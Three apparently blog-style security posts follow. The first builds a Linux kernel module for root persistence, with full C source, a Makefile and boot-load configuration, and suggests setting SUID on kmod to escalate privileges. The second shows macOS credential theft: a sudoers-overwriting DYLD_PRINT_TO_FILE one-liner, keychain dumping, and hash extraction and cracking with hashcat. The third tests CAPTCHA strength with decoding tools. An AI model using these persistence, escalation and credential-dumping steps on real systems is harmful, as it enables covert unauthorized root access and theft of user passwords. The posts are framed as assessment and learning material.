Establish Persistence with a Custom Kernel Module

First and foremost I have to admit that establishing persistence with a custom kernel module, isn’t the most ideal way. Creating kernel modules isn’t that easy. Kernel modules are normally compiled against a single kernel version, there are significant limitations on what can be done in kernel space, and errors can cause the system to freeze or crash. Regardless, I think its a valuable learning experience, that all Linux security professionals should understand. For a much easier way to maintain access to modern system check out my post on persistence with systemd timers.

As mentioned, kernel space capabilities are limited to dealing with files and devices on behalf of userspace applications. Since modules themselves are loaded into the running kernel it can be fairly difficult to write persistence code within a module that plays nice with the kernel space protections and limited functionality. Instead we can leverage a kernel function “call_usermodehelper” to execute a command in the requesting userspace. Since by default only the root user can request a module be loaded, this gives us command execution as root. In its most simplistic form the source code for a module, test_shell.c would look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros

MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{
    call_usermodehelper("/tmp/exe", NULL, NULL, UMH_WAIT_EXEC);
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Since kernel mode capabilities and libraries are so limited, we can further simplify the payload execution by staging it into a standard c application instead. This allows for the module to attempt to execute the staged application in a root terminal and still return normally regardless of what happens. The source code for a simple c execution program, nammed exe.c, might look like the following.

#include <stdlib.h>
int main(void)
{
    system("wall \"Hello There Im a Module!\"");
    return 0;
}

If we don’t want to stage a second executable to establish persistence with the custom kernel module, its possible to create variables for the users environment and command line arguments to be passed directly to the ‘call_usermodeheler’ function. The module source code to do this might look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros


MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{

    static char *envp[] = {
    "HOME=/",
    "TERM=linux",
    "USER=root",
    "SHELL=/bin/bash",
    "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
    NULL};

    char *argv[] = {
    "wall",
    "\"Hello I'm a Module!\"",
    NULL};

    call_usermodehelper("/bin/bash", argv, envp, UMH_WAIT_EXEC);
    printk(KERN_INFO "Installing Module!\n");
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Before compiling the module, you will need to be on the target system or a similar system with the same kernel version. You will also need to have all of the required tools for kernel development and the current kernels header files. The easiest way to do that is to run ‘apt-get install build-essential linux-headers-$(uname -r)’ on Debian based systems or ‘yum install kernel-headers kernel-devel glibc-devel gcc gcc-c++ make’ for Redhat based systems.

Once the build tools are installed, we can create a Makefile with a kbuild (kernel builder) extension at the top to compile our module. Just keep in might that kbuild will switch to the kernel source directory and only allow use of includes of headers within the original source.

obj-m += test_shell.o

all:
         make -C /lib/modules/$(shell uname -r)/build M=${PWD} modules

clean:
        make -C /lib/modules/$(shell uname -r)/build M=${PWD} clean

You can use a command like ‘insmod test_shell.ko’ to load a module directly into the kernel and ‘rmmod test_shell.ko’ to remove the module. This allows for easy testing of modules, before configuring them to automatically loaded at boot.

Once the module is complied and tests successfully, we can copy the module to the current kernels’ modules directory.

cp test_shell.ko /lib/modules/`uname -r`/kernel/lib/

Next we need to run ‘depmod’ to build out the binary tree files of all the modules and dependencies. Without the dependency tree updated, the system wont know our module exists or how to load it into the kernel.

depmod -a 

If we are going to stage the second executable for the module to attempt to execute, then we will need to compile it with gcc like the following.

gcc exe.c -o /tmp/exe

To have persistence with the custom kernel module loaded at boot time, we need to modify the config files for either modprobe or kmod depending on which is used. In most cases you can easily figure out if its a kmod system by looking if the standard module tools are just symbolic links to kmod. This can be done with a command like the following.

ls -al `which modprobe`

If the you do see modprobe is just a symbolic link to kmod, getting a registered module to start at boot is fairly simple. Just place the name of the module, minus the .ko extension, in the /etc/module config file. This can be done with a simple command like the following. It will cause systemd-modules-load service to utlize kmod, to automatically load the module on boot.

echo 'test-shell' >> /etc/modules

Interesting you can actually set the SUID bit on kmod so standard users can load modules as root. Whereas if you set SUID on legacy modprobe executable, it still runs in the userspace instead. So simply setting SUID on the kmod executable can be an easy way to establish privilege escalation similar to the dash shell, I’ve blogged about before.

If its not a kmod system, we can instead utilize modprobe to automatically start the custom module by creating a .conf file in the /etc/modeprobe.d/ directory. The content of the .conf should look similar too:

install test_shell

On modprobe systems, standard users can also request a module be loaded, if there is a valid configuration file that already exists. But any code execution is done within the requesting users context. Interestingly enough you can have modprobe run a terminal command after loading a module by appending a command to the end of install statement in the config file. That could work as a persistence method as well, but there is no guarantee all filesystems are mounted and networking has been established when the module is loaded.

With all that work complete, we have established persistence, until the kernel is updated at least.

Mac OSX Password Cracking

Mac OSX Password Cracking

TL;DR: There are several ways to enumerate information from a Mac shell and to collect encrypted credentials for OSX password cracking.

Problem and Rationale

During a recent assessment the client had close to 10,000 Mac OSX systems throughout their global presence. All of these Macs were authenticating to Active Directory and allowed all logged in users local admin rights; via a misconfigured sudoers rule. Since this blog is lacking any real reference material specifically for OSX, I figured I would detail the information gathering and attacks I preformed during the assessment.

Attacks and Methodology

The default base install of Apple OSX will allow the primary user configured on that workstation to sudo to  root. When Active Directory backed authentication is used, newly logged in users can inherit the primary user role if system defaults are not changed. This would effectively make all domain users local admins on all of the affected Macs. This is good news since root level permission is required to pull local password hashes.

If the OSX systems do not use AD authentication don’t fret. By default the SSH server is enabled and it does not have any lock outs on failed login attempts. If all else fails, physical attacks still work very well against OSX. Just walk up to one and hold Command+S during boot to log into a single user root terminal. If the system isn’t using full disk encryption you can simply copy files over to a USB flash drive.

Once you have a terminal on a Mac, it’s good to check user and group memberships. Again, if the user is a part of the admin group they can sudo by default; and if they are part of the wheel group they are effectively root.The following is a list of useful commands to use when in a terminal:

dscl . -list /Users #List local users
dscl . -list /Groups #List local groups
dscl . -read /Groups/<Groupname> #List local group membership
dscl . -read /Users/<usersname> #List a user’s information and settings

Note: The commands above all have a target of ‘.’ or ‘localhost’. If the system is connected to Active Directory it can be queried in a similar manner.To list all Domain Admins use the following command:

dscl /Active\ Directory/<domain>/<domain.local> -list /Groups/Domain\ Admins

If the user doesn’t have sudo or root privileges, you can try to elevate to root privileges with one of several local privilege escalation vulnerabilities. Some recent noteworthy options include CVE-2015-5889, CVE-2015-1130, or just use some of the Yosemite environment variables like the following:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

If the device is up to date on its patches about all one can do is some file pillaging. The two things I would note are Apple scripts (.scpt) and property list (.plist) files are very popular in OSX. Both file types are stored to disk as binary files. As such they need to be converted back to ASCII, to be human readable.
To view the contents of an Apple script file use a command like:

osadecode logon.scpt

To convert a .plist file from binary to its native XML use a command like:

plutil -convert xml1 /path/to/file.plist

Note: plutil will convert files in place, so take care to make copies of files you’re working with.Alternatively the plist files can be exfiltrated to Kali and converted to XML using the libplist-utils library. The conversion command might look something like this:

plistutil -i user.plist -o user.xml

If root level access is acquired, we can go straight after the local user’s plist files. Each user’s plist file contains their individual settings and their encrypted credentials. The directory that contains all local users’ plist files is /private/var/db/dslocal/nodes/Default/users/.
If another user is currently logged into the system, the user’s keychain can be dumped by root. This will provide clear text access to all saved credentials, iCloud keys, the file vault encryption key, and the user’s clear text password. To dump the users keychain use a security command like:

security dump-keychain -d /Users/<user>/Library/Keychains/login.keychain

WARNING: In newer versions of OSX this will generate a dialog box on the user’s screen. This will obviously alert the user and only produce usable output if the user accepts.

OSX Password Cracking

There are several ways to gain access to the encrypted shadow data, which is needed to conduct OSX password cracking. Two of them have already been mentioned above. If you have root access preform a dscl . -read /Users/<user> or if you grab the users plist file from /private/var/db/dslocal/nodes/Default/users/ and covert it to XML, there will be a XML element called ShadowHashData. The ShadowHashData is a base64 encoded blob containing a plist file with the base64 encoded entropy, salt, and iterations within it.

Note: Before the base64 can be cleanly decoded in each of these steps, the XML elements, spaces, and line breaks will need to be removed manually.
The first step is to extract the plist file form the shadow hash data and convert it back to XML. This can be done with the following commands:

echo "<hash data>" | base64 -D > shadowhash
file shadowhash
plutil -convert xml1 shadowhash

Next cleanup and convert the base64 encoded entropy to hex format. This can be done with the following commands:

echo "<entropy data>" | base64 -D > entropy
file entropy
xxd entropy

Third cleanup and convert the base64 encoded salt to hex format. This can be completed with the following set of commands:

echo "<salt data>" | base64 -D > salt
file salt
xxd salt

Next we can put all the hex value strings together into the following hashcat format (7100).

$ml$<iterations>$<salt>$<entropy>

Lastly put that baby in hashcat as OSX v10.8/v10.9 and watch it burn.

./hashcat-cli64.app -m 7100 hash.txt wordlist.txt

As Always:

ICBfICAgXyAgICAgICAgICAgIF8gICAgICBfX19fXyBfICAgICAgICAgICAgX19fXyAgXyAgICAg
ICAgICAgICAgICAgIF8gICANCiB8IHwgfCB8IF9fIF8gIF9fX3wgfCBfXyB8XyAgIF98IHxfXyAg
IF9fXyAgfCAgXyBcfCB8IF9fIF8gXyBfXyAgIF9fX3wgfF8gDQogfCB8X3wgfC8gX2AgfC8gX198
IHwvIC8gICB8IHwgfCAnXyBcIC8gXyBcIHwgfF8pIHwgfC8gX2AgfCAnXyBcIC8gXyBcIF9ffA0K
IHwgIF8gIHwgKF98IHwgKF9ffCAgIDwgICAgfCB8IHwgfCB8IHwgIF9fLyB8ICBfXy98IHwgKF98
IHwgfCB8IHwgIF9fLyB8XyANCiB8X3wgfF98XF9fLF98XF9fX3xffFxfXCAgIHxffCB8X3wgfF98
XF9fX3wgfF98ICAgfF98XF9fLF98X3wgfF98XF9fX3xcX198

Decoding Weak CAPTCHA’s

Decoding Weak CAPTCHA’s

TLDR; Weak CAPTCHA services utilized on the internet can be programmatically solved with a fairly high success rate.

Problem

A lot of firms, including mine, have begun to recommended CAPTCHA’s be used on all web forms which feed into existing business processes (registration pages, contact pages, etc). This recommendation can be a double edged sword, because there are still several CAPTCHA services that utilize weak CAPTCHA’s, which can be readily decoded with modern image analysis techniques. That being said several individuals have asked if there is a systematic way to test the strength of a given CAPTCHA, to determine weather it’s weak or not.

Solution

There are two major methodologies currently being widely used to  decode weak CAPTCHA’s. The first technique is to remove the noise from CAPTCHA images by reversing the programmatic functions, used to add visual abstractions. Then simply comparing each character to a set of known sample characters. This method relays heavily on evaluating each weak CAPTCHA service offering and creating reliable function sets to solve individual CAPTCHA’s. The best tool for using this technique to test for known weak CAPTCHA types is pwntcha.

The second methodology uses vector based image analysis to compare each pixels location to the expected location given, each possible character. After consolidating all of these pixel location checks, each possible character is ranked based on its probability of being correct.  The success of this method relays heavily on the use of a reference font, thus if the reference font and the CAPTCHA’s font are distantly different the analysis won’t go well. The best freely available tool I’ve found using this technique to test the strength of CAPTCHA’s is captcha-decoder.

How to use

Unfortunately almost every implementation of CAPTCHA’s is going to be different enough to make web scrapping a sample set of CAPTCHA images difficult. Thus the first step is always going to be downloading three to five CAPTCHA images for testing.

Then we can run each image through pwntcha and see if it can identify the image as a known weak CAPTCHA type.

Pwntcha <img>

Test run using Paypal’s known weak CAPTCHA samples 100/100

Test run of vBullentin’s known weak CAPTCHA samples 100/100

Last we can run captcha-decoder on each of the sample images to try and get an idea if vector based analysis is going to be successful.  You will have to use your best judgment once you receive the results to determine if the risk is high enough to create an issue. Generally if all the correct letters are guessed with over 70% confidence the CAPTCHA should be considered weak. However an organization may believe 70% is too high and may only have a much lower tolerance.

decaptcha <img or img url> –min 0 –max 20 –limit 5 –channels 5 –tolerance 7

Current font test image on mondor (a public API and web resource site)

So here in this case the variable boldness of the letters tricked the vector analysis into thinking the K was an X and the L was an I.

References

Pwntchahttp://caca.zoy.org/wiki/PWNtcha
Pwntcha known compiling issueshttps://blog.bmonkeys.net/2014/build-pwntcha-on-ubuntu-14-04
Note: if you have an issue with bootstrap, edit the bootstrap file to include automake version 13 and 14.
Captcha-decoder – https://github.com/mekarpeles/captcha-decoder
Note: if you have an issue with installing, make sure the python-dev system package is installed.